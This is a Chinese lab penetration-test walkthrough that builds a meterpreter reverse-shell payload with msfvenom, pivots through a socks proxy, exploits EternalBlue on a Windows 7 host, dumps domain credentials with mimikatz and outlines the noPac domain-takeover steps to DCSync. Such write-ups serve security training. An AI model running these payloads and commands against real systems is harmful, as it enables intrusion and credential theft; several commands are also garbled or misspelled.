分享一次靶场渗透( 二 ) _靶场渗透

文章插图

首先生成一个32位的elf马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf

文章插图

然后加权并执行
chmod 777 shell.elf./shell

文章插图

kali使用exploit/multi/handler进行监听

文章插图

获取到宿主机的shell

文章插图

然后添加10.0.1.0/24段的路由
bgroute add 10.0.1.0 255.255.255.0 1route print

文章插图

然后配置proxychain4.conf文件并使用socks模块
search socksuse auxiliary/sevrer/socks_proxyrun

文章插图

我们在之前已经知道了内网主机的ip，那么这里我们直接使用proxychain配合nmap对10.0.1.7的端口进行扫描
proxychains4 nmap -sT -Pn 10.0.1.7

文章插图

发现有445端口，那么对445端口进一步扫描

文章插图

先确定一下系统版本，使用
auxiliary/scanner/smb/smb_version模块，发现是win7 sp1

文章插图

看能不能利用永恒之蓝，这里使用到
auxiliary/scanner/smb/smb_ms17_010模块，发现可以利用永恒之蓝

文章插图

使用
exploit/windows/smb/ms17_010_eternalbule模块，因为是不出网环境，这里需要用到bind_tcp载荷

文章插图

run之后拿到一个system权限的meterpreter

文章插图

在C:UsersrootDesktop下拿到第二个flag

文章插图

然后继续进行信息搜集，发现同样是双网卡，还存在10.0.0.0/24段的一张网卡

文章插图

ipconfig /all看到dns服务器为redteam.lab应该在域内

文章插图

这里ping一下redteam.lab得到域控的ip为10.0.0.12

文章插图

这里不知道域控有什么洞，先上传一个mimikatz把密码抓取出来，得到Administrator/Admin12345，这里其实就可以使用域管账户ipc直接连接，但是这里抓到了一个域用户，尝试使用最新的CVE-2021-42287、CVE-2021-42278来进行攻击，关于漏洞的原理请移步
privilege::debugsekurlsa::logonpasswords

文章插图

文章插图

这里我准备使用noPac.exe直接去获取一个shell的，但是这里noPac.exe的利用条件是需要主机上有.net4.0环境，所以这里没有回显

noPac.exe下载地址：
https://github.com/cube0x0/noPac

文章插图

本来准备一步一步的用原始的方法打的，但是powershell用不了没有回显，就写一下原始利用的步骤吧

首先创建一个机器账户，可以使用 impacket 的 addcomputer.py或是powermadaddcomputer.py是利用SAMR协议创建机器账户，这个方法所创建的机器账户没有SPN，所以可以不用清除
清除机器账户的servicePrincipalName属性
将机器账户的sAmaccountName，更改为DC的机器账户名字，注意后缀不带$
为机器账户请求TGT
将机器账户的sAMAccountName更改为其他名字，不与步骤3重复即可
通过S4U2self协议向DC请求ST
进行 DCsync Attack